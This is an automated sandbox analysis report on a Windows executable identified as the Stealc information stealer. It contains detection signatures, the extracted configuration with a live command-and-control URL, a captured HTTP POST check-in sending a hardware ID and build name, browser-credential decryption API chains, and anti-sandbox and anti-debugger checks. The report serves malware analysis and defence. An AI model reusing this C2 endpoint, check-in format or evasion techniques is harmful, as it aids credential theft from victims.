Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1528823
MD5: f10c33b85dcdad1afd46afc292250f45
SHA1: cbf1860f2913584c90cb369f65cc2f3f9ed07f7d
SHA256: fef07dfe69df3e939e6a3bc0e097b4507e052f873bd8d0cffe54508c9ce7e6af
Tags: exe user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F10C33B85DCDAD1AFD46AFC292250F45)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.1759771807.0000000004D40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7112 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7112 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.380000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-10-08T10:28:21.774078+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.380000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00387240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00389AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00389B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00398EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00394910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00394570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00393EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCF
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 46 39 41 37 46 38 46 31 32 44 34 31 30 36 38 35 34 30 37 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 2d 2d 0d 0a
Data Ascii:
------JKJDAEBFCBKECBGDBFCF
Content-Disposition: form-data; name="hwid"

6F9A7F8F12D41068540764
------JKJDAEBFCBKECBGDBFCF
Content-Disposition: form-data; name="build"

doma
------JKJDAEBFCBKECBGDBFCF--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00386280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCF
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 46 39 41 37 46 38 46 31 32 44 34 31 30 36 38 35 34 30 37 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 2d 2d 0d 0a
Data Ascii:
------JKJDAEBFCBKECBGDBFCF
Content-Disposition: form-data; name="hwid"

6F9A7F8F12D41068540764
------JKJDAEBFCBKECBGDBFCF
Content-Disposition: form-data; name="build"

doma
------JKJDAEBFCBKECBGDBFCF--
Source: file.exe, 00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1800775191.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1800775191.0000000001197000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1800775191.00000000011A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/01
Source: file.exe, 00000000.00000002.1800775191.0000000001197000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/4D
Source: file.exe, 00000000.00000002.1800775191.0000000001184000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1800775191.0000000001184000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpBa
Source: file.exe, 00000000.00000002.1800775191.00000000011AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phph
Source: file.exe, 00000000.00000002.1800775191.0000000001184000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpva=T

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00745005
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00750949
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D411C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075B9B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0074BA0F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007072E7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00746AAE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00608B2D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00619B39
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0074D499
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00748566
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075756E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00755DB5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DE608
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 003845C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: zmsppxmk ZLIB complexity 0.9947472370715802
Source: file.exe, 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1759771807.0000000004D40000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00399600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00393720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\AIM13Z2D.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1844224 > 1048576
Source: file.exe | Static PE information: Raw size of zmsppxmk is bigger than: 0x100000 < 0x19c200

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.380000.0.unpack :EW;.rsrc :W;.idata :W; :EW;zmsppxmk:EW;bobhsqhc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;zmsppxmk:EW;bobhsqhc:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00399860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c85f6 should be: 0x1ca4c3
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: zmsppxmk
Source: file.exe | Static PE information: section name: bobhsqhc
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0039B035 push ecx; ret | 0_2_0039B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083008C push 2A1F704Bh; mov dword ptr [esp], eax | 0_2_0083009A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083008C push edi; mov dword ptr [esp], 6EFD8D00h | 0_2_008300B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083008C push ebx; mov dword ptr [esp], esi | 0_2_008300FF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BE862 push edi; mov dword ptr [esp], 7FF96F41h | 0_2_007BE886
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BE862 push 7DA59575h; mov dword ptr [esp], eax | 0_2_007BE943
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BE862 push ecx; mov dword ptr [esp], edi | 0_2_007BE961
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00776843 push 29291C8Dh; mov dword ptr [esp], eax | 0_2_0077687C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008098B4 push ebx; mov dword ptr [esp], 667AA600h | 0_2_0080982A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008098B4 push eax; mov dword ptr [esp], ecx | 0_2_00809967
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0077804D push ebp; mov dword ptr [esp], edx | 0_2_0077806E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C1838 push 4F64F0E6h; mov dword ptr [esp], eax | 0_2_007C1881
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push 2180BEB6h; mov dword ptr [esp], ecx | 0_2_0075404C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push ebp; mov dword ptr [esp], edx | 0_2_0075406A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push eax; mov dword ptr [esp], edx | 0_2_00754085
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push ecx; mov dword ptr [esp], 1CD0B131h | 0_2_007540CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push eax; mov dword ptr [esp], esi | 0_2_0075425E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push 428A57B3h; mov dword ptr [esp], esi | 0_2_007543B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push edi; mov dword ptr [esp], 75FF7081h | 0_2_007543C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push 3BA5FA27h; mov dword ptr [esp], edx | 0_2_007544A3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push 2F1B1309h; mov dword ptr [esp], esp | 0_2_007544C6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push 44AECE45h; mov dword ptr [esp], edi | 0_2_00754500
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push 547A2200h; mov dword ptr [esp], edi | 0_2_0075451D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push ebx; mov dword ptr [esp], 7F8BB202h | 0_2_0075453E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push edi; mov dword ptr [esp], esp | 0_2_00754549
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push ecx; mov dword ptr [esp], edx | 0_2_00754577
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push 47E3AE00h; mov dword ptr [esp], ebx | 0_2_0075462A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push 28DAEC84h; mov dword ptr [esp], esi | 0_2_00754635
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push ebx; mov dword ptr [esp], 71686C11h | 0_2_00754639
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push 3289A0A8h; mov dword ptr [esp], edi | 0_2_007546F7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075403D push 56463362h; mov dword ptr [esp], esi | 0_2_007546FF
Source: file.exe | Static PE information: section name: zmsppxmk entropy: 7.953354892161169

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00399860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13563
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E20D8 second address: 5E20DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75EA25 second address: 75EA29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75EA29 second address: 75EA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F402CDD4F61h 0x0000000b push ebx 0x0000000c jmp 00007F402CDD4F5Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75ED47 second address: 75ED4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75ED4B second address: 75ED51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75ED51 second address: 75ED5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75ED5A second address: 75ED77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F402CDD4F56h 0x0000000c popad 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F402CDD4F5Ah 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75ED77 second address: 75ED7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75F077 second address: 75F07B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75F07B second address: 75F081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75F2E2 second address: 75F2EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 762D0A second address: 762D69 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F402CC7E508h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jng 00007F402CC7E50Ch 0x00000019 js 00007F402CC7E506h 0x0000001f jmp 00007F402CC7E511h 0x00000024 popad 0x00000025 nop 0x00000026 mov edx, eax 0x00000028 push 00000000h 0x0000002a or dx, 3CE9h 0x0000002f mov dword ptr [ebp+122D2DADh], edi 0x00000035 call 00007F402CC7E509h 0x0000003a jmp 00007F402CC7E50Ch 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 762D69 second address: 762D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 762D6D second address: 762D77 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 762D77 second address: 762DCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F402CDD4F64h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 jmp 00007F402CDD4F62h 0x00000017 pop eax 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e pop eax 0x0000001f jng 00007F402CDD4F5Ch 0x00000025 jns 00007F402CDD4F56h 0x0000002b popad 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
